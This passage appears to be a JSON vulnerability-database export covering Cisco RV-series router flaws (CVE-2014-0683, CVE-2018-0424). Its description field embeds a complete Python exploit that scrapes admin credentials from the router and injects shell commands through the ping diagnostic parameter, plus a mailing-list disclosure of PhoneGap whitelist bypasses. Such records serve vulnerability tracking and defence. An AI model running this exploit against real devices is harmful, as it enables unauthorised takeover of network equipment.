            "vendor": "cisco",
            "version": "1.1.0.5"
          },
          {
            "model": "cvr100w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.1.19"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.0.9"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:cisco:cvr100w",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:cvr100w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:rv110w",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:rv215w",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Gustavo Javier Speranza",
        "sources": [
          {
            "db": "BID",
            "id": "65988"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-0683",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-0683",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-01575",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-68176",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0683",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-0683",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-01575",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201403-132",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-68176",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. \nAn attacker can exploit this issue to perform man-in-the-middle attacks  and disclose sensitive information. Successful exploits may lead to  other attacks. \nThis issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n    IP = argv[1]\n    PORT = argv[2]\n    CMD = argv[3]\n    \n    # Get session key, Just access index page. \n    url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n    req = urllib2.Request(url)\n    result = urllib2.urlopen(req)\n    res = result.read()\n    \n    # parse \u0027admin_pwd\u0027! -- Get credits\n    admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n    admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n    print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n    # Get session_id by POST\n    req2 = urllib2.Request(url + \"login.cgi\")\n    req2.add_header(\u0027Origin\u0027, url)\n    req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req2.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req2.add_header(\u0027Referer\u0027, url)\n    req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data = {\"submit_button\": \"login\",\n            \"submit_type\": \"\",\n            \"gui_action\": \"\",\n            \"wait_time\": \"0\",\n            \"change_action\": \"\",\n            \"enc\": \"1\",\n            \"user\": admin_user,\n            \"pwd\": admin_pwd,\n            \"sel_lang\": \"EN\"\n            }\n    r = urllib2.urlopen(req2, urllib.urlencode(data))\n    resp = r.read()\n    login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n    session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n    # Execute your commands via diagnose command parameter, default command is `reboot`\n    req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n    req3.add_header(\u0027Origin\u0027, url)\n    req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req3.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req3.add_header(\u0027Referer\u0027, url)\n    req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data_cmd = {\"submit_button\": \"Diagnostics\",\n            \"change_action\": \"gozila_cgi\",\n            \"submit_type\": \"start_ping\",\n            \"gui_action\": \"\",\n            \"traceroute_ip\": \"\",\n            \"commit\": \"1\",\n            \"ping_times\": \"3 |\" + CMD + \"|\",\n            \"ping_size\": \"64\",\n            \"wait_time\": \"4\",\n            \"ping_ip\": \"127.0.0.1\",\n            \"lookup_name\": \"\"\n            }\n    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n            \n\n. The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. \nAs there has been no response, we are re-posting it here to alert the general public \nof the inherent vulnerabilities in Apache Cordova/PhoneGap. \n\n##############################################################################################\nDear PhoneGap contributors,\n\n\nPhoneGap\\x92s domain whitelisting for accessing native resources is\nbroken and can be bypassed. These vulnerabilities can be exploited by\nany third-party domain loaded inside an iframe (e.g., malicious ad\nscripts). Below, we give a brief summary of the vulnerabilities. You\ncan find more details in the paper \u003chttp://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e. \n\n\n1. Domain whitelisting on Android (before API 11) and Windows Phone 7\nand 8 relies on the URL interception call that does not intercept\niframe and XMLHttpRequest URLs. Consequently, it does not restrict\nwhich domains can be loaded in iframes. Any script inside an iframe\ncan directly use PhoneGap\\x92s internal JavaScript interfaces to the Java\nobjects and access native resources: for example, by calling execute =\ncordova.require(\u0027cordova/exec\u0027); var opts = cordova.require\n(\u0027cordova/plugin/ ContactFindOptions\u0027 ); and directly operating on\nthese objects. \n\n\n2. A malicious script running in an iframe can dynamically choose any\nof PhoneGap\\x92s vulnerable bridge mechanisms at runtime (e.g. \naddJavascriptInterface or loadUrl on Android) and use it to bypass the\ndomain whitelist. We call this the chosen-bridge attack. \n\n\n3. PhoneGap\\x92s whitelisting check on Android is incorrect - it misses\nan anchor at the end of the regular expression:\nthis.whiteList.add(Pattern.compile(\"\\x88https?://(.*\\\\.)?\" + origin));\n\nFor example, if foo.com is whitelisted, foo.com.evil.com will pass the check. \n\n4. PhoneGap\\x92s domain whitelisting on Android (API 11 or highler) and\niOS does not adhere to the same-origin policy.  Third-party scripts\nincluded using \u003cscript\u003e tags are blocked unless their source domain is\nwhitelisted, even though these scripts execute in the origin of the\nhosting page, not their source origin. \n\n\n5. Instead of just blocking access to bridges from non-whitelisted\ndomains, PhoneGap completely blocks these domains from being loaded in\nthe browser. This prevents ad-supported apps from displaying\nthird-party ads and destroys the look-and-feel of many Web pages. \n\n\nWe have a proof-of-concept implementation (a 400-line patch for\nPhoneGap 2.9.0 on Android) called NoFrak\n[https://github.com/georgiev-martin/NoFrak] which fixes these\nvulnerabilities. NoFrak does not allow Web content from\nnon-whitelisted domains to access native resources but still displays\nit correctly in the browser. If you are interested in discussing how\nto merge NoFrak or some parts of NoFrak to PhoneGap\\x92s main branch,\nplease let us know. \n\n\nThanks,\n\nMartin, Suman, and Vitaly\n\n##############################################################################################\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "BID",
            "id": "65988"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "PACKETSTORM",
            "id": "150781"
          },
          {
            "db": "PACKETSTORM",
            "id": "124954"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-68176",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0683",
            "trust": 3.5
          },
          {
            "db": "EXPLOIT-DB",
            "id": "45986",
            "trust": 1.1
          },
          {
            "db": "BID",
            "id": "65988",
            "trust": 1.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "124954",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575",
            "trust": 0.6
          },
          {
            "db": "CISCO",
            "id": "20140305 CISCO SMALL BUSINESS ROUTER PASSWORD DISCLOSURE VULNERABILITY",
            "trust": 0.6
          },
          {
            "db": "SECUNIA",
            "id": "57119",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "150781",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "125567",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "BID",
            "id": "65988"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "PACKETSTORM",
            "id": "150781"
          },
          {
            "db": "PACKETSTORM",
            "id": "124954"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "id": "VAR-201403-0204",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          }
        ],
        "trust": 1.32380537
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          }
        ]
      },
      "last_update_date": "2025-04-13T23:21:06.729000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20140305-rpd",
            "trust": 0.8,
            "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
          },
          {
            "title": "33019",
            "trust": 0.8,
            "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=33019"
          },
          {
            "title": "cisco-sa-20140305-rpd",
            "trust": 0.8,
            "url": "http://www.cisco.com/cisco/web/support/JP/112/1122/1122121_cisco-sa-20140305-rpd-j.html"
          },
          {
            "title": "Multiple Cisco RV Series Routers Verify Patches That Surpass Password Disclosure Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/44175"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-255",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140305-rpd"
          },
          {
            "trust": 1.1,
            "url": "https://www.exploit-db.com/exploits/45986/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0683"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0683"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/531356"
          },
          {
            "trust": 0.6,
            "url": "http://www.internetsociety.org/ndss2014/programme#session3"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2014/jan/96"
          },
          {
            "trust": 0.6,
            "url": "http://packetstormsecurity.com/files/124954/apachecordovaphonegap-bypass.txt"
          },
          {
            "trust": 0.6,
            "url": "http://secunia.com/advisories/57119"
          },
          {
            "trust": 0.3,
            "url": "www.cisco.com"
          },
          {
            "trust": 0.1,
            "url": "https://\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
          },
          {
            "trust": 0.1,
            "url": "https://www.cisco.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://github.com/georgiev-martin/nofrak]"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "BID",
            "id": "65988"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "PACKETSTORM",
            "id": "150781"
          },
          {
            "db": "PACKETSTORM",
            "id": "124954"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "db": "BID",
            "id": "65988"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "db": "PACKETSTORM",
            "id": "150781"
          },
          {
            "db": "PACKETSTORM",
            "id": "124954"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-03-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "date": "2014-03-06T00:00:00",
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "date": "2014-03-05T00:00:00",
            "db": "BID",
            "id": "65988"
          },
          {
            "date": "2014-03-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "date": "2018-12-14T18:00:57",
            "db": "PACKETSTORM",
            "id": "150781"
          },
          {
            "date": "2014-01-26T04:44:44",
            "db": "PACKETSTORM",
            "id": "124954"
          },
          {
            "date": "2014-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "date": "2014-03-06T11:55:05.287000",
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-03-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-01575"
          },
          {
            "date": "2018-12-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-68176"
          },
          {
            "date": "2014-03-05T00:00:00",
            "db": "BID",
            "id": "65988"
          },
          {
            "date": "2014-03-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          },
          {
            "date": "2014-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0683"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Wireless-N VPN Vulnerabilities that can gain management access in product firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001579"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201403-132"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201810-0302

    Vulnerability from variot - Updated: 2024-11-23 23:08

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an authenticated, remote attacker to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input to scripts by the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the root user. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router. The vulnerability stems from a failure to validate data entered by the user

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0302",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.44"
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.1.3"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.2.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.0.21"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18073"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010839"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-263"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0424"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
